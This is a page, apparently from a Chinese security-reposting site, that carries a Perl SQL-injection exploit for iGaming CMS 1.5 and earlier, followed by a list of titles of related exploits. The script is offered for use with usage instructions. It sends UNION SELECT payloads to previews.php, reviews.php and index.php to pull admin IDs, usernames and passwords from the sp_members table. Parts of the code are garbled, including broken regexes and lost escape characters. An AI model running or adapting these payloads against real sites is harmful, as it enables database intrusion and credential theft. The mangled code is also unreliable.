手机
当前位置:查字典教程网 >网络安全 >Exploit >iGaming CMS
iGaming CMS
摘要:#!/usr/bin/perl#------------------------------------------------------...

#!/usr/bin/perl

# ----------------------------------------------------------

# iGaming <= 1.5 Multiple Remote SQL Injection Exploit

# Perl Exploit - Output: id:admin:password

# Discovered On: 23/09/2008

# Discovered By: StAkeR - StAkeR[at]hotmail[dot]it

# Proud To Be Italian

# ----------------------------------------------------------

# Usage: perl exploit.pl http://localhost/iGaming

# ---------------------------------------------------------- use strict;

use LWP::UserAgent; my ($one,$two,$exec,$host,$http,$xxx,$view); $view = "' union select 0,0,1,2,concat(0x25,id,0x3a,pseudo,0x3a,pass,0x25),0,6,7,8 from sp_members WHERE id='1/*";

$exec = "' union select 1,concat(0x25,id,0x3a,pseudo,0x3a,pass,0x25),3 from sp_members where id='1/*";

$host = shift @ARGV;

$http = new LWP::UserAgent or die $!;

$http->agent("Mozilla/4.5 [en] (Win95; U)");

$http->timeout(1);

if($host !~ /^http://(. ?)$/)

{

print "[?] iGaming CMS <= 1.5 Multiple Remote SQL Injection Exploitn";

print "[?] Usage: perl $0 http://[path]n";

exit;

}

else

{

$one = $http->get($host.'/previews.php?browse='.$exec);

$two = $http->get($host.'/reviews.php?browse='.$exec);

$xxx = $http->get($host.'/index.php?do=viewarticle&id='.$view);

if($one->is_success or $two->is_success or $xxx->is_success)

{

die "$1n" if $one->content =~ /%(. ?)%/;

die "$1n" if $two->content =~ /%(. ?)%/;

die "$1n" if $xxx->content =~ /%(. ?)%/;

}

else

{

die "[ ] Exploit Failed!n";

}

}

【iGaming CMS】相关文章:

The Personal FTP Server 6.0f RETR Denial of Service Exploit

BrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service

Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection Exploit

Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit

Dana IRC 1.4a Remote Buffer Overflow Exploit

Windows Media Encoder wmex.dll ActiveX BOF Exploit (MS08-053)

Mole Group Last Minute Script

Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability

Belkin wireless G router ADSL2 modem Auth Bypass Exploit

Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability

精品推荐
分类导航